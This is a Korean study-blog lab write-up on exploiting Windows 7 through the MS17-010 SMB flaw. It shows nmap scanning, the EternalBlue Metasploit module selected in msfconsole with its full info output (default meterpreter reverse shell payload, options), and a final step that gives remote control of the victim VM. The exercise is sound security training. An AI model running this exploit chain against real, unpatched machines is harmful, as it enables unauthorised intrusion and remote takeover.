본문 바로가기
개인 공부/rookies

metasploit을 이용한 취약점 진단 실습 - 3

by 아메리카노와떡볶이 2022. 10. 4.
728x90

이번 실습에서 다뤄볼 것은 윈도우7의 이미 알려진 취약점을 진단하는 것입니다.

 

1-day attack

0-Day Attack은 아직 까지 알려지지 않은 신규 보안 취약점을 이용한 공격입니다. 때문에 해당 보안 취약점에 대한 보안 패치가 이루어지기 전까지는 어떠한 방어책도 존재하지 않습니다.

 

반면에 1-day attack은 해당 취약점이 발견되고, 보안 패치도 발표되었지만 사용자가 보안 패치를 수행하지 않는 경우 이를 노린 공격입니다.

윈도우7의 취약점을 공격하는 경우는 1-day attack에 해당합니다.

 

실습환경

공격자 : 칼리 리눅스(. 130)

피해자 :  윈도우7 ( . 131 )

 

 

 

1. 포트스캐닝

칼리에서 네트워크 스캔을 통해 ip를 스캔해보면 윈도우7 타겟을 확인할 수 있습니다.

 

이전과 마찬가지로 nmap 버전 스캔을 통해 포트와 서비스 버전을 확인합니다.

135,139,445 등의 포트가 열려있습니다.

이전의 metasploitable2 에 비하면 열려있는 포트가 매우 적습니다.

윈도우7은 보통 일반 pc로 사용되기때문에 서버 환경보다 실행하는 서비스가 적습니다.

때문에 포트스캐닝을 통해서는 취약점을 찾기 어렵습니다 !

 

2. 스크립트 스캐닝

다음으로 nmap 올 스캔을 통해서 스크립트 스캐닝을 합니다. 

스크립트를 보면 smb와 smb2 가 같이 쓰이고 있는 것을 볼 수 있는데, 이것은 윈도우7이 과도기적인 os라 이전 운영체제와의 호환성을 유지하기 위해 smb가 취약점을 가지고 있음에도 여전히 같이 사용하고 있는 것입니다.

 

smb 취약점에 해당하는 스크립트를 검색해보면

다음과 같이 smb-vuln-ms17-010 스크립트가 vulnerable 하다는 결과를 확인할 수 있습니다.

CVE-2017-0143 취약점으로, SMB1의 원격 코드 실행 취약점을 나타냅니다.

 

msfconsole에서 해당 취약점을 공격하는 모듈을 검색해보면 다음과 같은 결과가 나옵니다.

저는 이중 0번에 해당하는 이터널 블루 모듈을 사용하겠습니다.

 

해당 모듈을 사용하고, info를 통해 모듈 정보를 확인해보겠습니다

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  thelightcosine
  wvu <wvu@metasploit.com>
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
  Id  Name
  --  ----
  0   Automatic Target
  1   Windows 7
  2   Windows Embedded Standard 7
  3   Windows Server 2008 R2
  4   Windows 8
  5   Windows 8.1
  6   Windows Server 2012
  7   Windows 10 Pro
  8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://github.com/rapi
                                            d7/metasploit-framework/wiki/Using-Metasploit
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authen
                                            tication. Only affects Windows Server 2008 R2,
                                            Windows 7, Windows Embedded Standard 7 target m
                                            achines.
  SMBPass                         no        (Optional) The password for the specified usern
                                            ame
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Ta
                                            rget. Only affects Windows Server 2008 R2, Wind
                                            ows 7, Windows Embedded Standard 7 target machi
                                            nes.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only
                                             affects Windows Server 2008 R2, Windows 7, Win
                                            dows Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE

그 후

타겟 ip와 페이로드 지정 후 익스플로잇해주면

윈도우7을 원격으로 조종할수 있게 된다.

 

728x90

댓글